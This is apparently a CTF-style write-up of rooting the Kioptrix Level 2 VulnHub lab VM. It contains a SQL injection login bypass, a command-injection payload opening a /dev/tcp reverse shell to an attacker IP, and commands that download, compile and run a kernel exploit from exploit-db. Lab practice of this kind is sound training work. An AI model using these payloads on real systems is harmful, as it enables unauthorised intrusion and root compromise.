Kioptrix: Level 2

This is my writeup for the Kioptrix Level 2 VM from vulnhub.com. It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.

Intelligence Gathering

nmap

We now have a list of ports. When we access the IP of the VM on port 80, we see a login form which can be bypassed by entering:

username: admin' '1'or'1

login_form

We then find a console asking us to enter an IP to ping. It kinda begs for malicious input.

console

$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Searchsploit returns https://www.exploit-db.com/exploits/9542/.

Exploitation

Reverse shell

Start netcat on kali:

$ nc -nvlp 42

Try to connect back:

1;0<&196;exec 196<>/dev/tcp/192.168.254.161/42; sh <&196 >&196 2>&196

rev_shell-1

rev_shell_connected

Kernel

Since we now have a reverse shell we can run the mentioned exploit.

$ curl -k https://www.exploit-db.com/download/9542/ > exploit.c
$ gcc -o exploit exploit.c
$ chmod +x exploit
$ ./exploit

exploit-2

oscp vulnhub writeup spoiler kioptrix